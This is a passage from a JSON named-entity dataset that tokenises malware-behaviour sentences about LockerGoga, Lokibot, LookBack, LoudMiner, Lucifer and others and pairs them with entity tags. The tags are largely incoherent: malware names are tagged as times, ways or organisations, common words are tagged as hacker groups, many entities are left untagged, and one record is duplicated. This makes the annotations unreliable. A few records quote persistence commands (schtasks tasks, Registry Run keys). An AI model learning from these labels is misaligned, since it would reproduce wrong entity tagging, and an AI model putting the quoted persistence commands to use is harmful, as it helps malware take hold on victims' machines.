"O", - "O" - ] - }, - { - "tokens": [ - "LoJax", - "is", - "a", - "UEFI", - "BIOS", - "rootkit", - "deployed", - "to", - "persist", - "remote", - "access", - "software", - "on", - "some", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoJax", - "is", - "a", - "UEFI", - "BIOS", - "rootkit", - "deployed", - "to", - "persist", - "remote", - "access", - "software", - "on", - "some", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LockerGoga", - "has", - "been", - "observed", - "changing", - "account", - "passwords", - "and", - "logging", - "off", - "current", - "users." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "LockerGoga", - "has", - "been", - "signed", - "with", - "stolen", - "certificates", - "in", - "order", - "to", - "make", - "it", - "look", - "more", - "legitimate." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LockerGoga", - "has", - "encrypted", - "files,", - "including", - "core", - "Windows", - "OS", - "files,", - "using", - "RSA-OAEP", - "MGF1", - "and", - "then", - "demanded", - "Bitcoin", - "be", - "paid", - "for", - "the", - "decryption", - "key." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LockerGoga", - "installation", - "has", - "been", - "immediately", - "preceded", - "by", - "a", - "\"task", - "kill\"", - "command", - "in", - "order", - "to", - "disable", - "anti-virus." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LockerGoga", - "has", - "been", - "observed", - "deleting", - "its", - "original", - "launcher", - "after", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LockerGoga", - "has", - "been", - "observed", - "moving", - "around", - "the", - "victim", - "network", - "via", - "SMB,", - "indicating", - "the", - "actors", - "behind", - "this", - "ransomware", - "are", - "manually", - "copying", - "files", - "form", - "computer", - "to", - "computer", - "instead", - "of", - "self-propagating." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LockerGoga", - "has", - "been", - "observed", - "shutting", - "down", - "infected", - "systems." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "utilized", - "multiple", - "techniques", - "to", - "bypass", - "UAC." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "stolen", - "credentials", - "from", - "multiple", - "applications", - "and", - "data", - "sources", - "including", - "Windows", - "OS", - "credentials,", - "email", - "clients,", - "FTP,", - "and", - "SFTP", - "clients." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "demonstrated", - "the", - "ability", - "to", - "steal", - "credentials", - "from", - "multiple", - "applications", - "and", - "data", - "sources", - "including", - "Safari", - "and", - "the", - "Chromium", - "and", - "Mozilla", - "Firefox-based", - "web", - "browsers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "decoded", - "and", - "decrypted", - "its", - "stages", - "multiple", - "times", - "using", - "hard-coded", - "keys", - "to", - "deliver", - "the", - "final", - "payload,", - "and", - "has", - "decoded", - "its", - "server", - "response", - "hex", - "string", - "using", - "XOR." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "the", - "ability", - "to", - "initiate", - "contact", - "with", - "command", - "and", - "control", - "(C2)", - "to", - "exfiltrate", - "stolen", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "will", - "delete", - "its", - "dropped", - "files", - "after", - "bypassing", - "UAC." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "can", - "search", - "for", - "specific", - "files", - "on", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "the", - "ability", - "to", - "copy", - "itself", - "to", - "a", - "hidden", - "file", - "and", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "downloaded", - "several", - "staged", - "items", - "onto", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "the", - "ability", - "to", - "capture", - "input", - "on", - "the", - "compromised", - "host", - "via", - "keylogging." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "tricked", - "recipients", - "into", - "enabling", - "malicious", - "macros", - "by", - "getting", - "victims", - "to", - "click", - "\"enable", - "content\"", - "in", - "email", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "modified", - "the", - "Registry", - "as", - "part", - "of", - "its", - "UAC", - "bypass", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "used", - "LoadLibrary(),", - "GetProcAddress()", - "and", - "CreateRemoteThread()", - "API", - "functions", - "to", - "execute", - "its", - "shellcode." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "obfuscated", - "strings", - "with", - "base64", - "encoding." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "used", - "PowerShell", - "commands", - "embedded", - "inside", - "batch", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "used", - "process", - "hollowing", - "to", - "inject", - "itself", - "into", - "legitimate", - "Windows", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "reflectively", - "loaded", - "the", - "decoded", - "DLL", - "into", - "memory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "embedded", - "the", - "commands", - "<code>schtasks", - "/Run", - "/TN", - "\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup", - "/I</code>", - "inside", - "a", - "batch", - "script." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot's", - "second", - "stage", - "DLL", - "has", - "set", - "a", - "timer", - "using", - "“timeSetEvent”", - "to", - "schedule", - "its", - "next", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "used", - "several", - "packing", - "methods", - "for", - "obfuscation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "is", - "delivered", - "via", - "a", - "malicious", - "XLS", - "attachment", - "contained", - "within", - "a", - "spearhpishing", - "email." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "the", - "ability", - "to", - "discover", - "the", - "computer", - "name", - "and", - "Windows", - "product", - "name/version." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "the", - "ability", - "to", - "discover", - "the", - "domain", - "name", - "of", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "the", - "ability", - "to", - "discover", - "the", - "username", - "on", - "the", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "performed", - "a", - "time-based", - "anti-debug", - "check", - "before", - "downloading", - "its", - "third", - "stage." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "used", - "VBS", - "scripts", - "and", - "XLS", - "macros", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "used", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lokibot", - "has", - "used", - "<code>cmd", - "/c</code>", - "commands", - "embedded", - "within", - "batch", - "scripts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LookBack", - "side", - "loads", - "its", - "communications", - "module", - "as", - "a", - "DLL", - "into", - "the", - "<code>libcurl.dll</code>", - "loader." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LookBack", - "has", - "a", - "function", - "that", - "decrypts", - "malicious", - "data." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "LookBack", - "removes", - "itself", - "after", - "execution", - "and", - "can", - "delete", - "files", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LookBack", - "can", - "retrieve", - "file", - "listings", - "from", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LookBack", - "has", - "a", - "C2", - "proxy", - "tool", - "that", - "masquerades", - "as", - "<code>GUP.exe</code>,", - "which", - "is", - "software", - "used", - "by", - "Notepad++." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LookBack", - "uses", - "a", - "custom", - "binary", - "protocol", - "over", - "sockets", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LookBack", - "can", - "list", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "LookBack", - "sets", - "up", - "a", - "Registry", - "Run", - "key", - "to", - "establish", - "a", - "persistence", - "mechanism." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LookBack", - "can", - "take", - "desktop", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "LookBack", - "can", - "kill", - "processes", - "and", - "delete", - "services." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "LookBack", - "uses", - "a", - "modified", - "version", - "of", - "RC4", - "for", - "data", - "transfer." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "LookBack", - "can", - "enumerate", - "services", - "on", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LookBack", - "can", - "shutdown", - "and", - "reboot", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LookBack", - "has", - "used", - "VBA", - "macros", - "in", - "Microsoft", - "Word", - "attachments", - "to", - "drop", - "additional", - "files", - "to", - "the", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-SamFile", - "I-SamFile", - "B-SecTeam", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LookBack’s", - "C2", - "proxy", - "tool", - "sends", - "data", - "to", - "a", - "C2", - "server", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LookBack", - "executes", - "the", - "<code>cmd.exe</code>", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "LoudMiner", - "has", - "obfuscated", - "various", - "scripts." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoudMiner", - "is", - "typically", - "bundled", - "with", - "pirated", - "copies", - "of", - "Virtual", - "Studio", - "Technology", - "(VST)", - "for", - "Windows", - "and", - "macOS." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoudMiner", - "has", - "encrypted", - "DMG", - "files." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "LoudMiner", - "deleted", - "installation", - "files", - "after", - "completion." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoudMiner", - "has", - "set", - "the", - "attributes", - "of", - "the", - "VirtualBox", - "directory", - "and", - "VBoxVmService", - "parent", - "directory", - "to", - "\"hidden\"." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoudMiner", - "used", - "SCP", - "to", - "update", - "the", - "miner", - "from", - "the", - "C2." - ], - "ner_tags": [ - "B-Time", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoudMiner", - "adds", - "plist", - "files", - "with", - "the", - "naming", - "format", - "<code>com.[random_name].plist</code>", - "in", - "the", - "<code>/Library/LaunchDaemons</code>", - "folder", - "with", - "the", - "RunAtLoad", - "and", - "KeepAlive", - "keys", - "set", - "to", - "<code>true</code>." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoudMiner", - "launched", - "the", - "QEMU", - "services", - "in", - "the", - "<code>/Library/LaunchDaemons/</code>", - "folder", - "using", - "<code>launchctl</code>.", - "It", - "also", - "uses", - "<code>launchctl</code>", - "to", - "unload", - "all", - "Launch", - "Daemons", - "when", - "updating", - "to", - "a", - "newer", - "version", - "of", - "LoudMiner." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "LoudMiner", - "used", - "an", - "MSI", - "installer", - "to", - "install", - "the", - "virtualization", - "software." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoudMiner", - "used", - "the", - "<code>ps</code>", - "command", - "to", - "monitor", - "the", - "running", - "processes", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoudMiner", - "harvested", - "system", - "resources", - "to", - "mine", - "cryptocurrency,", - "using", - "XMRig", - "to", - "mine", - "Monero." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "I-Purp", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "LoudMiner", - "has", - "used", - "QEMU", - "and", - "VirtualBox", - "to", - "run", - "a", - "Tiny", - "Core", - "Linux", - "virtual", - "machine,", - "which", - "runs", - "XMRig", - "and", - "makes", - "connections", - "to", - "the", - "C2", - "server", - "for", - "updates." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoudMiner", - "started", - "the", - "cryptomining", - "virtual", - "machine", - "as", - "a", - "service", - "on", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoudMiner", - "has", - "monitored", - "CPU", - "usage." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoudMiner", - "used", - "a", - "script", - "to", - "gather", - "the", - "IP", - "address", - "of", - "the", - "infected", - "machine", - "before", - "sending", - "to", - "the", - "C2." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoudMiner", - "used", - "shell", - "scripts", - "to", - "launch", - "various", - "services", - "and", - "to", - "start/stop", - "the", - "QEMU", - "virtualization." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg" - ] - }, - { - "tokens": [ - "LoudMiner", - "used", - "a", - "batch", - "script", - "to", - "run", - "the", - "Linux", - "virtual", - "machine", - "as", - "a", - "service." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "LoudMiner", - "can", - "automatically", - "launch", - "a", - "Linux", - "virtual", - "machine", - "as", - "a", - "service", - "at", - "startup", - "if", - "the", - "AutoStart", - "option", - "is", - "enabled", - "in", - "the", - "VBoxVmService", - "configuration", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Lslsass", - "can", - "dump", - "active", - "logon", - "session", - "password", - "hashes", - "from", - "the", - "lsass", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "use", - "the", - "Stratum", - "protocol", - "on", - "port", - "10001", - "for", - "communication", - "between", - "the", - "cryptojacking", - "bot", - "and", - "the", - "mining", - "server." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "clear", - "and", - "remove", - "event", - "logs." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "decrypt", - "its", - "C2", - "address", - "upon", - "execution." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "exploit", - "multiple", - "vulnerabilities", - "including", - "EternalBlue", - "(CVE-2017-0144)", - "and", - "EternalRomance", - "(CVE-2017-0144)." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "B-Way", - "B-Features" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "download", - "and", - "execute", - "a", - "replica", - "of", - "itself", - "using", - "certutil." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "use", - "certutil", - "for", - "propagation", - "on", - "Windows", - "hosts", - "within", - "intranets." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "execute", - "TCP,", - "UDP,", - "and", - "HTTP", - "denial", - "of", - "service", - "(DoS)", - "attacks." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "scan", - "for", - "open", - "ports", - "including", - "TCP", - "ports", - "135", - "and", - "1433." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "has", - "attempted", - "to", - "brute", - "force", - "TCP", - "ports", - "135", - "(RPC)", - "and", - "1433", - "(MSSQL)", - "with", - "the", - "default", - "username", - "or", - "list", - "of", - "usernames", - "and", - "passwords." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "identify", - "the", - "process", - "that", - "owns", - "remote", - "connections." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "check", - "for", - "existing", - "stratum", - "cryptomining", - "information", - "in", - "<code>HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\spreadCpuXmr", - "–", - "%stratum", - "info%</code>." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "persist", - "by", - "setting", - "Registry", - "key", - "values", - "<code>HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\QQMusic</code>", - "and", - "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\QQMusic</code>." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "use", - "system", - "resources", - "to", - "mine", - "cryptocurrency,", - "dropping", - "XMRig", - "to", - "mine", - "Monero." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "infect", - "victims", - "by", - "brute", - "forcing", - "SMB." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Lucifer", - "has", - "established", - "persistence", - "by", - "creating", - "the", - "following", - "scheduled", - "task", - "<code>schtasks", - "/create", - "/sc", - "minute", - "/mo", - "1", - "/tn", - "QQMusic", - "^", - "/tr", - "C:Users\\%USERPROFILE%\\Downloads\\spread.exe", - "/F</code>." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "has", - "used", - "UPX", - "packed", - "binaries." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "perform", - "a", - "decremental-xor", - "encryption", - "on", - "the", - "initial", - "C2", - "request", - "before", - "sending", - "it", - "over", - "the", - "wire." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "check", - "for", - "specific", - "usernames,", - "computer", - "names,", - "device", - "drivers,", - "DLL's,", - "and", - "virtual", - "devices", - "associated", - "with", - "sandboxed", - "environments", - "and", - "can", - "enter", - "an", - "infinite", - "loop", - "and", - "stop", - "itself", - "if", - "any", - "are", - "detected." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "collect", - "the", - "computer", - "name,", - "system", - "architecture,", - "default", - "language,", - "and", - "processor", - "frequency", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "collect", - "the", - "IP", - "address", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Purp", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "can", - "identify", - "the", - "IP", - "and", - "port", - "numbers", - "for", - "all", - "remote", - "connections", - "from", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Lucifer", - "has", - "the", - "ability", - "to", - "identify", - 